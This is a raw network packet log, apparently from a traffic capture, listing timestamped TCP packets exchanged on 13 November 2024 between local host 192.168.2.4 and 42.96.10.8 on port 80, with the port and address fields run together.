                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848340988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848356962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848371029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848387003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848391056 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848403931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848417997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848421097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848434925 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848434925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848468065 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848479033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848494053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848501921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848525047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848531961 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848542929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848556995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848565102 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848573923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848588943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848592997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848604918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848619938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848635912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848642111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848661900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848728895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848743916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848758936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848772049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848776102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848794937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848875046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848891020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848905087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848916054 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848921061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848938942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848953009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848963022 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848968029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848984957 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849009991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849014997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849031925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849045038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849060059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849072933 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849076033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849095106 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849100113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849116087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849131107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849145889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849159956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849163055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849178076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849184990 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849194050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849194050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849210978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849235058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849236965 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849247932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849291086 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849315882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849330902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849344015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849359035 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849389076 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849423885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849438906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849453926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849467993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849479914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849484921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849500895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849508047 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849534988 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849569082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849586010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849611044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849620104 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849627018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849642038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849657059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849672079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849673986 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849688053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849694967 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849705935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849721909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849736929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849744081 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849769115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849806070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849821091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849837065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849843025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849881887 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849920034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849934101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849947929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849965096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849966049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.849982977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850001097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850016117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850018978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850033045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850044966 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850069046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850075960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850090981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850106001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850131035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850131989 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850146055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850162983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850178003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850181103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850193024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850202084 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850209951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850223064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850236893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850248098 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850254059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850271940 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850287914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850334883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850349903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850364923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850379944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850390911 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850423098 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850502968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850517988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850533962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850548983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850557089 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850565910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850579977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850591898 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850609064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850620031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850625992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850635052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850650072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850672960 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850693941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850748062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850763083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850780010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850796938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850809097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850832939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850845098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850857019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850861073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850878000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850886106 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850893974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850909948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850913048 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850924015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850938082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850955963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850961924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850972891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850985050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.850990057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851018906 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851142883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851159096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851175070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851186991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851191044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851207018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851214886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851223946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851242065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851253033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851257086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851274014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851278067 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851289988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851324081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851332903 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851341963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851356983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851371050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851381063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851387024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851389885 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851402044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851438046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851471901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851488113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851511955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851515055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851527929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851545095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851552010 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851557970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851573944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851579905 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851591110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851604939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851613998 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851619959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851636887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851645947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851660967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851672888 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851677895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851712942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851723909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851738930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851752996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851772070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851784945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851788998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851804018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851829052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851829052 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851845026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851867914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.851887941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901338100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901485920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901501894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901527882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901542902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901550055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901559114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901573896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901588917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901603937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901607037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901607037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901622057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901634932 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901637077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901663065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901678085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901684046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901695967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901711941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901714087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901729107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901743889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901753902 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901770115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901786089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901803017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901817083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901830912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901837111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901837111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901837111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.901952982 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.932744026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.932760954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.932775021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.932861090 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.932873964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.932890892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.932905912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.932950020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.932950020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.941970110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.941988945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.942003965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.942022085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.942038059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.942070007 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.942070007 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.942353964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.942368984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.943048000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.943074942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.943090916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.943104982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.943145037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.943146944 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.943161964 CET804973342.96.10.8192.168.2.4
